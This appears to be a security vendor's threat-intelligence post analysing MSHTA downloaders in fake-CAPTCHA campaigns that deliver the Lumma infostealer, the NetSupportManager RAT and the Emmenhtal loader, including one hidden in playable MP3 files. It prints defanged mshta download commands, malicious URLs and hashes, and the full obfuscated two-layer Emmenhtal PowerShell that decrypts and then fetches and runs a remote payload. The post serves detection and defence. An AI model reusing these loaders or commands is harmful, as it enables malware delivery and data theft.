The Sound of Malware

Anvilogic has recently observed a large uptick in first stage downloaders that utilize MSHTA.exe. MSHTA.exe is a legitimate Windows system file known as a legitimate Windows system file known as Microsoft HTML Application Host. Often, but not always, the downloaders have a theme that entices the user to proceed or take action related to Cloudflare, reCaptcha or Ray. When executed, the downloaders often lead to a multi-stage infection chain with varying levels of obfuscation and uniqueness, including embedding the malware in a playable MP3 file.

Studying event and OS logs at our customers has allowed us to gain useful context around these recent campaigns and allowed us to link several clusters of activity. New activity often comes in waves, with new angles and methodologies being tested by attackers.

Anvilogic observed an uptick and new MSHTA trend beginning in August and continuing through September 2024. The structure of the commands were basic, with no detectable theme in naming convention. The URIs included files with no extension, or comment:

Atomic-level threat identifier (For Anvilogic customers & the GitHub community)

• mshta.exe File Download (Anvilogic Armory | GitHub)

C:\WINDOWS\system32\mshta.exe hxxps://zone03.b-cdn . net/tr17
C:\Windows\system32\mshta.exe hxxps://mato-camp-v1.b-cdn . net/kesty
C:\Windows\system32\mshta.exe hxxps://getyourpages . com/downloads/t2
C:\Windows\system32\mshta.exe hxxps://tera17.b-cdn [.] net/tr17

Ultimately, whether a downloader is successful depends on how successful it is at running on a variety of system configurations and contexts. What makes MSHTA particularly potent for a first stage downloader is its ubiquity on Windows based operating systems and only having one required parameter: a URI with code to be executed. These downloader commands are portable, dead simple and effective. While we will later show that additional layers of complexity were added, these early infections often give useful information about what attackers may later attempt to do.

In the August and September instances, hxxps://getyourpages [.] com/downloads/t2 served up Sha256Sum: 073bf9e8fd710a361df3bfe3d7e8060606ea054ab86779e2da7b2190cc59a781. Virustotal reports this as a member of the Palebeam malware family, and was able to determine that the configuration contained the URI hxxps://getyourpages . com / downloads / tera2.zip as shown below:

The tera2.zip file had a Sha256 of 74fb85f85c08ed074ff5cb7261161c163220d23c23502b427d6372cd73ae1f06 and clocked in at an abnormally large 9.56MB. Another noteworthy piece of information here are the detections, there is a consensus that this sample is the Lumma infostealer:

It’s worth noting that Lumma almost always comes with additional files that serve to bloat the size of the file, but are not malicious. For the tera2.zip file mentioned above, the only malicious file appeared to be a file named 0DollarERP.exe (sha256sum: bbcf22aa482ee7f3cf7d9defdad1df591e354264609814a62d4b3fb42bb5ecbe) , which is capable of infecting hosts separate from the additional, sizable old and benign files included with it:

0DollarERP.exe interestingly connects to a profile page on the gaming platform steam (steamcommunity.com/profiles/76561199724331900) that contains encoded data:

Using cyberchef’s “ROT13” tool with an “Amount” value of 15 reveals URLs:

Ray-Verify and the NetSupportManager RAT

In late October, we observed the first instance of a new pattern: MSHTA downloaders purporting to contain a “Ray Verification ID”:

Anvilogic Detections

• Command Line Homoglyphs - Windows (Anvilogic Armory | GitHub)
• mshta.exe File Download (Anvilogic Armory | GitHub)
• Suspicious CAPTCHA Command Line (Anvilogic Armory | GitHub)

mshta.exe hxxps:// forthedoglover [.] com /Ray-verify.html #     ✅ ''Verify you are human - Ray Verification ID:  6456''"
mshta.exe hxxps://tekascend [.] com/Ray-verify.html #     ✅ ''Verify you are human - Ray Verification ID:  1437''"
mshta.exe hxxp://mwnetwork [.] biz /Ray-verify.html #     ✅ ''Verify you are human - Ray Verification ID:  3058''"

“Ray Verification ID” process command lines observed starting late October 2024

The “Ray Themed” downloaders had a common chain of infection. First, they pointed to malformed HTA files named /Ray-verify.html, which once decoded led to a batch of second-stage URIs:

hxxps:// forthedoglover [.] com /Ray-verify.html -> hxxp://traversecityspringbreak [.] com /o/o.png
hxxps://tekascend [.] com/Ray-verify.html -> hxxp:// goaccredited [.] biz/o/o.png 
hxxps:// forthedoglover [.] com /Ray-verify.html  -> hxxp://traversecityspringbreak [.] com /o/o.png

Ray first stage ray-verify.html files and their targets.

The formatting of these second stage download locations differs from other clusters of activity around the same time and always delivers variants of the same payload: the NetSupportManager RAT.

The earliest example we identified of NetSupportManager, Sha256: 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8. True to form, the earliest sample gave us some useful clues. It contacted `geo [.] netsupportsoftware [.] com` which serves to advertise the software as a legitimate remote access solution:

Samples of NetSupportManager identified in the wild included

hxxp:// traversecityspringbreak [.] com/o/9.png -> 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8
hxxp:// goaccredited [.] biz/o/o.png -> 06a0a243811e9c4738a9d413597659ca8d07b00f640b74adc9cb351c179b3268
hxxp://tekascend [.] com/a/b.png -> b91fcd8501f5e5458675c9f07d5eadeee62b53eb2638fee5da9f48a8f44abd3b

NetSupportManager Samples and their download locations

Changing Downloaders and Payloads

Beginning late December 2024 a few new trends emerged simultaneously, continuing until today - a new second-stage downloader and new Lumma payloads appeared with a new powershell wrapper. Prior to this, the second stage of most download paths were handled by a PE based downloader named Palebeam:

Palebeam PE Downloader download locations and second stage download locations

The Emmenhtal downloader is essentially a two-layer powershell script: the first layer contains a ciphertext with embedded AES key. The ciphertext is decoded by powershell at runtime and execution is passed to it after decoding is complete. Here’s what the first layer looks like:

Anvilogic Detections

• Bypass or Unrestricted PowerShell Execution (Anvilogic Armory | GitHub)
• PowerShell CreateDecryptor (Anvilogic Armory | GitHub)

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w 1 -ep Unrestricted -nop function CijC($DimRSpi){-split($DimRSpi -replace '..', '0x$& ')};$Nqsh=CijC('A18EE0207C545302B72F45DF70FF796E8903BEFCC3AD2FCB0E761DE2412A289D4C550258A486F062128ED8326775AAA7711270EEFDB28019F3BE9311CE16664BE4D0FFB477B7E2205F748257AFEBF3C97D8BD5222241E09EEAE703CE7CDD20E4B0A5A71D0AE014C20429EA4BE9ADE2A1CE0E7A8BFB30EAF0A172EE4E6A7E62F3A02C2B1FCC8415DE11FF9D64F01501643E699AF97F46E0C746D3D41238BBD3962A8CE0179293E7BBD45D36C372CA30915BDFACB1C149D720F2C1096474FC2BB67FD8AC590206BD198CB170F5D8CF1B1DE02121554E580EF88AA727CB03EB0835C1580CC7583871263900098CF769AB43931B9BDF8FAB4B2AF22EF3913321343199A425FD3A80324D42423D6F428C9170B9C18230F6863B2E607242054E28BAB737F3193913E10BF665A87D669C9DF6FA0D869CB9232BD009DB9985E453607E2FC2C3AEE8D4A701E9692C081FC217F7C244800F57AF6B68939D2DEC2E0A3036F1BD81AE3F64CF2CD2987E4E574C3FE423C2E17C32FF309A35518982992B1A7EE5A0812FEB37F21D4DF4A76B80F738D5CF6743CFDF814F4B2C89E3E56A0C88685861AF2CC18DB8DD88085C017EDE34A1FE1DBED3691E67C54D4F6C924DEC57FFAA734219BBA260C9D561CCE03FACF031BC1B560B5A2C7783E86FDEF3F3BEF20B824E1BA3E305BDAB0D27A2C49494B4A8A11BFA9B7F1F987FF21B51CDA21A1639864733CB19A1A2A659E0331FF883569FE426F358D3AF37CC6551FCFDB1A5FC84E83A569A7D54D2654274E9C6C3AFF80AFCE33BADE2C1ECBD36150D38DAF68F6D255AC3DEBAD5FF3B27867881EF1034970D2D47A3F1F647B3A011506DA813B72A211799C39949B9195A9550583121BE1002142B33E74C4D088E609CF695E217FA732599938DE2BCE0BCA9C61338FCCBA3D68BB41FF4B102A8D263C4B11A24FEF767F6A152A53A1E6DE6559E062AC45C4A8B03999FD8B14647CC8FB29FCE08EB8E9185C4DA959E465D52975FA86D13F3693A00512E16E27D16886FC255AD236A79D3A73CADEA3712846B1759D65DF9C6EDBBB99B85C30D06B66C4139BCEE35A63835C44757AE7844DD2BE8A6E8ED2C4030CC269986FA1B9F46D25681F5E92B46015F6DB9649A507BE0F471CE6B6FA020558AAB31D6E3CCFA3C6D7CBDBA2AC950069588B74E8BD96758CF6FBA634F52EA4A806A0FC812DECC823EB18C32AD3EC9530A2E8491776A6B1D897E4B5C436FAA37B32862C0B54E800846DA29CB9D625F27DC978E54B8B790CF007263EA774F82D0C5DAF0CC3F660DCFB73F2C20996E934EE5A75F45911606E6B07B9674BE670A1690');$RjYEaMLuZ=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((CijC('416B7652685A635669524E7976547165')),[byte[]]::new(16)).TransformFinalBlock($Nqsh,0,$Nqsh.Length)); & $RjYEaMLuZ.Substring(0,3) $RjYEaMLuZ.Substring(3)

Emmenhtal first layer script contents, from Sha256: 034694376c291c82789e7dc2c8771a4dff47c1c447f2ea7427edb968f480fa71

The second stage more closely resembles a traditional unobfuscated powershell download, although there is typically light obfuscation in the second layer as well:

Anvilogic Detections

• Bypass or Unrestricted PowerShell Execution (Anvilogic Armory | GitHub)
• PowerShell Hidden Window (Anvilogic Armory | GitHub)

"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w h -ep Unrestricted -Command SI Variable:\p 'hxxps://kangla [.] klipxytozyi [.] shop/kangarooing.bmp';item *z;SI Variable:\Yj (&(Get-Variable E*tex*).Value.(((Get-Variable E*tex*).Value|Member)[6].Name).(((Get-Variable E*tex*).Value.(((Get-Variable E*tex*).Value|Member)[6].Name).PsObject.Methods|?{(GV _ -ValueOnl).Name-ilike '*lets'}).Name).Invoke('*w-*ct')Net.WebClient);.(Get-Item Alias:\*EX) (GCI Variable:/Yj).Value.((((GCI Variable:/Yj).Value|Member)|?{(GV _ -ValueOnl).Name-ilike '*nl*g'}).Name).Invoke((ChildItem Variable:/p).Value)

Emmenhtal second layer script contents, from Sha256: 034694376c291c82789e7dc2c8771a4dff47c1c447f2ea7427edb968f480fa71

In addition to Emmenhtal, the final Lumma payloads began to be encrypted using a powershell wrapper:

The Sound of Malware

The most interesting theme of Emmenhtal that we observed in our telemetry data involved audio themed HTA files:

When Emmenhtal used audio based file types, it contained enough legitimate content to partially load in our sandbox and play audio:

Shown above, our sandbox loaded the Emmenhtal hta file 6fc41e727cc16e0889a2731622181eba0d3ed3fdcfb67bb05364eee637d4cd55 as an audio file. This behavior indicates that there is enough structure left of a legitimate audio file to be loaded as one. The file was 6.65MB, a size reasonable for an MP3 file but quite large for malware. The file had the magic bytes 49 44 33 which indicates a “MP3 file with an ID3v2 container” but contains malicious content loadable by MSHTA.exe as well. 

‍

Anvilogic Detections

• Sequence threat techniques for Anvilogic customers: Fake CAPTCHAs Attack with File Download/Hidden & Persistence
• Atomic-level threat identifiers (For Anvilogic customers & the GitHub community)
  • Bypass or Unrestricted PowerShell Execution (Anvilogic Armory | GitHub)
  • Command Line Homoglyphs - Windows (Anvilogic Armory | GitHub)
  • Invoke-WebRequest Command (Anvilogic Armory | GitHub)
  • mshta.exe File Download (Anvilogic Armory | GitHub)
  • PowerShell CreateDecryptor (Anvilogic Armory | GitHub)
  • PowerShell Hidden Window (Anvilogic Armory | GitHub)
  • Suspicious CAPTCHA Command Line (Anvilogic Armory | GitHub)

Check Out Kevin's Previous Workshops on Detection Engineering Dispatch